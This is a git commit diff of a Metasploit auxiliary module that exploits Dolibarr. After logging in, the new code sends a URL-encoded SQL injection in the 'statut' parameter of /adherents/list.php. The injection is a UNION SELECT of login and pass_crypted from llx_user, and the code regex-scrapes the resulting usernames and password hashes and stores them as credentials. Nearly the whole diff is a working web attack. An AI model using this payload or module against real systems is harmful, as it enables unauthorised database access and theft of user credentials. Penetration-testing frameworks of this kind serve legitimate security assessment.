storing credentials

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-08-30 13:59:00 -05:00
parent 7915c4ac6c
commit 85c4abac99
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 15 additions and 5 deletions

View File

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
login_uri = target_uri.path << '/index.php' unless target_uri.path.include?('index.php') login_uri = target_uri.path << '/index.php' unless target_uri.path.include?('index.php')
cookies = response.get_cookies cookies = response.get_cookies
print_good(cookies) print_status("Logging in...")
login_res = send_request_cgi( login_res = send_request_cgi(
'method' => 'POST', 'method' => 'POST',
@ -67,24 +67,34 @@ class MetasploitModule < Msf::Auxiliary
fail_with(Failure::NoAccess, "Couldn't log into Dolibarr") fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
end end
print_good("Logged in!") print_good("Successfully logged into Dolibarr")
return cookies return cookies
end end
def get_info(cookies) def get_info(cookies)
inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23" inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23"
print_good(normalize_uri(inject_uri))
inject_res = send_request_cgi( inject_res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(inject_uri), 'uri' => normalize_uri(inject_uri),
'cookie' => cookies 'cookie' => cookies
) )
print_good(inject_res.body) unless inject_res && inject_res.body.include?('id="searchFormList"')
fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
end
print_good("Accessed credentials")
format_results(inject_res.body)
end end
def format_results def format_results(output)
credentials = output.scan(/valignmiddle">0<\/div><\/a><\/td>.<td>([a-zA-Z0-9]*)<\/td>.<td>(\S*)<\/td>/m)
unless credentials
fail_with(Failure::NotFound, "No credentials found")
end
credentials.each { |i, j| store_valid_credential(user: j, private: i) }
end end
def run def run